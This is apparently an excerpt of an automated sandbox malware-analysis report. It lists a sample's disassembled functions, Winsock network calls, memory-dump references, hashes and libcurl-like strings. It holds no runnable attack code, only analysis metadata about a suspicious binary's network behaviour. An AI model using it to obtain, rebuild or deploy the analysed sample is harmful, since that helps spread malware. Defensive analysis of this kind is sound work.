                                  • String ID: FD %s:%d sclose(%d)
                                  • API String ID: 2781271927-3116021458
                                  • Opcode ID: 1ecf2a0a61407c7557508a778c2a2e9959d13fa8831ef28650740a942c0b3dc8
                                  • Instruction ID: a2786e19f892258576bfe26cea7230fc8cb6588abebf1182c1c25ced69cea3aa
                                  • Opcode Fuzzy Hash: 1ecf2a0a61407c7557508a778c2a2e9959d13fa8831ef28650740a942c0b3dc8
                                  • Instruction Fuzzy Hash: B7D05E32A09231AB862065AA7D49C4BBAA8DDCAF64B464899F944A7200D1209C0087F2
                                  Function 004EB060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,004EB29E,?,00000000,?,?), ref: 004EB0BA
                                  • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,004D3C41,00000000), ref: 004EB0C1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: ErrorLastconnect
                                  • String ID:
                                  • API String ID: 374722065-0
                                  • Opcode ID: 9027a41b7ecb6a7a0cbf21d858f584beb4d37f408f90fafeb53c479681d32e5a
                                  • Instruction ID: 8ffa9f3b35841093dc3ec3ac0a1c0fc136ce4014f47e972a531c7a0c4801955a
                                  • Opcode Fuzzy Hash: 9027a41b7ecb6a7a0cbf21d858f584beb4d37f408f90fafeb53c479681d32e5a
                                  • Instruction Fuzzy Hash: 5C01D8363042419BCA205A6A9C84EABB399FF89365F040766F978932D1D72AFD508792
                                  Function 004D4950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • gethostname.WS2_32(00000000,00000040), ref: 004D4AA4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: gethostname
                                  • String ID:
                                  • API String ID: 144339138-0
                                  • Opcode ID: c9cb2befd2e9269be84bc9dbf71a0a5b4cc42f24064bdbe38c747635cb6f7183
                                  • Instruction ID: 2db35efb832d8ee8192e998a60c3cf2f5d7209f8620c952a23f87a54adb5baf7
                                  • Opcode Fuzzy Hash: c9cb2befd2e9269be84bc9dbf71a0a5b4cc42f24064bdbe38c747635cb6f7183
                                  • Instruction Fuzzy Hash: 8B51C3B06043008BEB309B36DD6972376D4AF91319F18197FE98A867D1E77DE844CB0A
                                  Function 004EAF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                  Download Yara Rule
                                  APIs
                                  • getsockname.WS2_32(?,?,00000080), ref: 004EAFD0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: getsockname
                                  • String ID:
                                  • API String ID: 3358416759-0
                                  • Opcode ID: 8f228aed5d2fde875a1ee54caaf6e10a736712b0ea6ca80f9e53527f15df5cd9
                                  • Instruction ID: fd68e72cf99ee93eb55acd94b0c7c459b79fe52326c7b6447d77c23f23892fe2
                                  • Opcode Fuzzy Hash: 8f228aed5d2fde875a1ee54caaf6e10a736712b0ea6ca80f9e53527f15df5cd9
                                  • Instruction Fuzzy Hash: F2116670808BC595EB268F1DD8027E7B3F4EFD0329F109619E59942150F7765AD68BC2
                                  Function 004EA920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • send.WS2_32(?,?,?,00000000,00000000,?), ref: 004EA97E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: send
                                  • String ID:
                                  • API String ID: 2809346765-0
                                  • Opcode ID: ebb6f74840fcee20827377b5214427ff0c92d65de117008b69bb7e152ea5578f
                                  • Instruction ID: e6db311a282aa9023065106399abf2f6e4289ea1652084f9db5fed1638145623
                                  • Opcode Fuzzy Hash: ebb6f74840fcee20827377b5214427ff0c92d65de117008b69bb7e152ea5578f
                                  • Instruction Fuzzy Hash: 6201A7B17017109FC6148F15DC45B56B7A5EFC4721F0A8559F9941B361C331BC118BD2
                                  Function 004EAF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • socket.WS2_32(?,004EB280,00000000,-00000001,00000000,004EB280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 004EAF66
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: socket
                                  • String ID:
                                  • API String ID: 98920635-0
                                  • Opcode ID: b80d660657436b172d3573f5e80f4c67f6b8132ebf0c1a417e26e2e82fd82fee
                                  • Instruction ID: 5c618884293ffb2b5b6dd73b0b5a384e3ead653a70ce7e09d94999fac8c486ea
                                  • Opcode Fuzzy Hash: b80d660657436b172d3573f5e80f4c67f6b8132ebf0c1a417e26e2e82fd82fee
                                  • Instruction Fuzzy Hash: 24E0EDB2A052216BD6649B58E8449ABF3A9EFC8B21F054A4ABC5463304C730BC508BE2
                                  Function 004EB020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                  Download Yara Rule
                                  APIs
                                  • closesocket.WS2_32(?,004E9422,?,?,?,?,?,?,?,?,?,?,?,w3M,008E1280,00000000), ref: 004EB04D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: closesocket
                                  • String ID:
                                  • API String ID: 2781271927-0
                                  • Opcode ID: a68a8bff075e7f99698b6d7583281c9561f9de05f920438831ce729e4418e29b
                                  • Instruction ID: d1d776cd6e9b4a31205c5311b5bacdd952e0a746ecdc2c179033c6c182132d63
                                  • Opcode Fuzzy Hash: a68a8bff075e7f99698b6d7583281c9561f9de05f920438831ce729e4418e29b
                                  • Instruction Fuzzy Hash: D7D0123470020157CA249A15C884A57766BBFD5711FA9CB68E42C8A655D73FEC478681
                                  Function 004867E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                  Download Yara Rule
                                  APIs
                                  • ioctlsocket.WS2_32(?,8004667E,?,?,0045AF56,?,00000001), ref: 004867FC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: ioctlsocket
                                  • String ID:
                                  • API String ID: 3577187118-0
                                  • Opcode ID: ba23d06a8acd89c09260b1dca89f136b8bf8f131197afd38c0abbffe7c08a9d3
                                  • Instruction ID: 51c6bd8fe0380b492677a0af7bca241a7374fac25c3ee312101794ca8da7ecb7
                                  • Opcode Fuzzy Hash: ba23d06a8acd89c09260b1dca89f136b8bf8f131197afd38c0abbffe7c08a9d3
                                  • Instruction Fuzzy Hash: 26C012F1118101EFC60C8714D895A6F76D9DB85355F01582CB04681180EA305990CA16
                                  Function 004231D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID:
                                  • API String ID: 2962429428-0
                                  • Opcode ID: e029dbdac30af05245c5cd9efec1fb2988c41ddd549f1a5b40814f3510b03ed2
                                  • Instruction ID: edc745e35287df497e1877f9263039bcd9a15e4efa26945ec19797357e0f3f4f
                                  • Opcode Fuzzy Hash: e029dbdac30af05245c5cd9efec1fb2988c41ddd549f1a5b40814f3510b03ed2
                                  • Instruction Fuzzy Hash: 4B3193B4908319DBCB00EF68D58569EBBF0BF44304F00896EE894E7341E7389A44DB92

                                  Non-executed Functions

                                  Function 00434940 Relevance: 17.0, Strings: 13, Instructions: 731COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                  • API String ID: 0-122532811
                                  • Opcode ID: 14886615337ff00e0c65041c0bc67e2513f43696d3956ece95ea25cfa66d9088
                                  • Instruction ID: 32f379c3bbc72bf1ab614558fc2a88ea3698f72a929acfa4c21bcf1b61dc8095
                                  • Opcode Fuzzy Hash: 14886615337ff00e0c65041c0bc67e2513f43696d3956ece95ea25cfa66d9088
                                  • Instruction Fuzzy Hash: C342F771B08700AFD708DE24CC41BABB6E6EFC8704F049A2DF55997391E779B8148B92
                                  Function 00444F70 Relevance: 12.2, Strings: 9, Instructions: 911COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                  • API String ID: 0-1914377741
                                  • Opcode ID: 64b76eafe324ccc605c8c4b76decc1665cff8b805b100644a5e7edb5c20847d5
                                  • Instruction ID: 559f817c8c833da6a5c5938014228c9ce6d0ab5ca353ccade13b4e87bea81308
                                  • Opcode Fuzzy Hash: 64b76eafe324ccc605c8c4b76decc1665cff8b805b100644a5e7edb5c20847d5
                                  • Instruction Fuzzy Hash: 10723A70A08B415BFF218A28C446767B7D29F91344F04862EED855B393E77EDC85C74A
                                  Function 004D9880 Relevance: 10.2, Strings: 8, Instructions: 226COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
